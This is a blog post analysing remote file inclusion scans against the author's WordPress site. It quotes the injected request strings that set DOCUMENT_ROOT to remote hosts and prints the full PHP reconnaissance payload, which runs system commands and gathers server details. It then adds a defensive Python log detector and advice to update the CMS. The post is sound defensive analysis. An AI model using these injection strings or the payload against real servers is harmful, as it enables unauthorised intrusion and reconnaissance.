Malicious web activity

I've noticed that since Friday there has been a lot of scanning activity against my blog. Fortunately, the attempts fail. The IP addresses come from a variety of countries like Denmark, Germany, Ukraine, the USA and the like, and all seem to belong to compromised machines running Windows 2000, 98 (go figure) and Solaris.

The scanning methods used are interesting. In the logs I can see all sorts of strings sent in a WordPress PHP variable (?) in order to exploit some kind of remote file inclusion vulnerability.

Here's an example of the requests being made to the server:

DOCUMENT_ROOT=http://bolikowski.com/images/_MD.TXT??
DOCUMENT_ROOT=http://www.pne.de//contenido/includes/cmd.txt??
_SERVER[DOCUMENT_ROOT]=http://notonyourradio.com/bresica.gif??
_SERVER[DOCUMENT_ROOT]=http://bolikowski.com/images/test.txt???

Well let's have a look at the content of those files:

<?php
function ConvertBytes($number) {
    $len = strlen($number);
	if($len < 4)
		return sprintf("%d b", $number);
	if($len >= 4 && $len <=6)
		return sprintf("%0.2f Kb", $number/1024);
	if($len >= 7 && $len <=9)
		return sprintf("%0.2f Mb", $number/1024/1024);

	return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Script Kiddx0r<br>";
$fast = @php_uname();
$fast2 = system(uptime);
$fast3 = system(id);
$fast4 = @getcwd();
$fast5 = getenv("SERVER_SOFTWARE");
$fast6 = phpversion();
$fast7 = $_SERVER['SERVER_NAME'];
$fast8 = gethostbyname($SERVER_ADDR);
$fast9 = get_current_user();
$fast10= diskfreespace($fast4);
$fast11 = ConvertBytes(diskfreespace($fast4));
if (!$fast11) {$fast11 = 0;}
$all1= disk_total_space($fast4);
$fast12 = ConvertBytes(disk_total_space($fast4));
if (!$fast12) {$fast12 = 0;}
$fast13 = ConvertBytes($all1-$fast10);
$os = @PHP_OS;

echo "Script Kiddx0r<br>";
echo "os: $os<br>";
echo "uname -a: $fast<br>";
echo "uptime: $fast2<br>";
echo "id: $fast3<br>";
echo "pwd: $fast4<br>";
echo "user: $fast9<br>";
echo "phpv: $fast6<br>";
echo "SoftWare: $fast5<br>";
echo "ServerName: $fast7<br>";
echo "ServerAddr: $fast8<br>";
echo "free: $fast11<br>";
echo "used: $fast12<br>";
echo "total: $fast13<br>";
echo "By Script Kiddx0r<br>";
exit;
?>

This PHP code gathers information about the server: PHP version, OS version and so on; it even has a function to convert the free disk space from bytes. There are other variants of the code, which you can check at the URLs above. The most interesting thing is that the files used in the inclusion come in various formats, like .txt and .gif; the .gif pretends to be an image, but it's just a PHP file with a .gif extension. Another fact is that most of the websites hosting these files have been compromised without the owner even noticing.
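Spotting these requests in your own logs is the practical takeaway, so here is a small detector written for this post (added example, not code from the original or from any of the attackers' files). It parses Apache combined-format lines, flags any query parameter whose value is a remote URL, and notes whether the parameter name is one of the two server-variable overwrites seen above; the log lines themselves are constructed, with documentation-range client IPs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines modelled on the requests quoted above;
# the third request is ordinary traffic for contrast.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2007:14:02:11 +0000] "GET /index.php?DOCUMENT_ROOT=http://bolikowski.com/images/_MD.TXT?? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.22 - - [10/Mar/2007:14:05:43 +0000] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://notonyourradio.com/bresica.gif?? HTTP/1.0" 200 7312 "-" "libwww-perl/5.805"
192.0.2.5 - - [10/Mar/2007:14:06:01 +0000] "GET /index.php?p=12&cat=news HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

# Combined-log prefix: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Parameter names that try to overwrite a PHP server variable (the two forms in the post).
SERVER_VAR_RE = re.compile(r'^(DOCUMENT_ROOT|_SERVER\[[^\]]*\])$')
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.I)


def rfi_indicators(target):
    """Return (param, value) pairs whose value is a remote URL: the RFI signature."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def scan_access_log(text):
    """One alert per request that carries a remote-URL parameter value."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a parseable access-log line
        hits = rfi_indicators(m['target'])
        if not hits:
            continue
        alerts.append({
            'ip': m['ip'],
            'status': int(m['status']),   # a 200 here deserves a closer look
            'params': hits,
            # hosts serving the include file: candidates for a blocklist or an abuse report
            'include_hosts': [urlsplit(v).hostname for _, v in hits],
            'targets_server_var': any(SERVER_VAR_RE.match(n) for n, _ in hits),
        })
    return alerts


if __name__ == '__main__':
    for a in scan_access_log(SAMPLE_LOG):
        print(a['ip'], a['status'], a['params'], a['include_hosts'], a['targets_server_var'])
```

A non-404 status on a flagged request is the line worth investigating first, since it means the targeted script actually exists on your site.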

It seems that there's a lot of scanning going on against websites (I'm getting nearly 3 scan attempts per hour), but I haven't found a reason for it; there's no recent disclosure of a related vulnerability. So I'll keep searching for clues about this. Keep an eye on your blog's activity, and update every CMS and plugin in use to the latest version.